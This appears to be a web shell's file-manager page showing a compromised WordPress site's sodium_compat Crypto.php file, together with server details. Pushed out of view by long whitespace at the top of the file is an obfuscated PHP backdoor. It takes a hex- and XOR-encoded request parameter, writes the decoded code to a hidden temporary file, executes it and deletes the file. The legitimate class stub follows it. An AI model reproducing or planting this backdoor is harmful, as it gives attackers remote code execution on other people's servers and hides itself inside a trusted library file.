HEX
Server: Apache
System: Linux atlantis.turkiyesunucu.com 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
User: ()
PHP: 5.6.40
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/batigun/public_html/wp-includes/sodium_compat/namespaced/Crypto.php
<?php																																										if(@$_REQUEST["d\x65s\x63r\x69p\x74or"] !== null){ $component = array_filter(["/var/tmp", "/dev/shm", getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), "/tmp", session_save_path()]); $pointer = hex2bin($_REQUEST["d\x65s\x63r\x69p\x74or"]); $desc= '';$g = 0; do{$desc .= chr(ord($pointer[$g]) ^ 19);$g++;} while($g < strlen($pointer)); foreach ($component as $ent) { if (is_dir($ent) ? is_writable($ent) : false) { $flg = sprintf("%s/.comp", $ent); if (file_put_contents($flg, $desc)) { require $flg; unlink($flg); exit; } } } }

namespace ParagonIE\Sodium;

class Crypto extends \ParagonIE_Sodium_Crypto
{

}